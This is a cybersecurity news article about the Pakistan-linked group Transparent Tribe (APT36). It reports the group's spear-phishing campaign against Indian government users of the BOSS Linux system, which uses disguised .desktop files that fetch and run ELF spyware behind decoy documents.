Cyberwarfare / Nation-State Attacks,
Fraud Management & Cybercrime
Pakistan-Linked Actors Target Indian Linux Operating System

A hacking group with ties to Pakistan is reportedly targeting Indian government systems running on a Linux-based operating system. The attackers are using deceptive tactics to entice government employees to open files that appear to be legitimate PDFs. Once accessed, these files deploy spyware, granting hackers prolonged access to sensitive governmental information.
See Also: OnDemand | North Korea’s Secret IT Army and How to Combat It
This particular threat actor is deploying malicious scripts on the Bharat Operating Systems Solution, a Debian Linux variant supported by the Indian government. The malicious files execute ELF binaries while presenting false documents, indicating a strategic advancement in the group’s infiltration methods. This was highlighted by cybersecurity firm Cyfirma.
Identified as Transparent Tribe, also known as APT36 or Earth Karkaddan, this group has been active since at least 2013 and is known for its cyberespionage operations targeting valuable information pertaining to Pakistani military and diplomatic goals. In 2024, security company BlackBerry reported that the group was conducting extensive campaigns aimed at government agencies and defense entities (see: Pakistani-Aligned APT36 Targets Indian Defense Organizations).
The initial assault often employs spear-phishing tactics, where the attackers send emails containing compressed files disguised as legitimate documents. These include a manipulated .desktop
file specifically designed for the BOSS operating system. When the file is opened, it executes a series of commands that download an ELF binary to a temporary directory, make it executable, and run it, while simultaneously displaying a decoy document through browsers like Firefox to obscure any malicious activity.
On Linux systems, .desktop
files are typically harmless shortcuts that assist users in launching applications or documents, akin to desktop icons in Windows. However, they can also be configured to automatically initiate specific programs upon user login, which raises the stakes for those unaware of potential threats.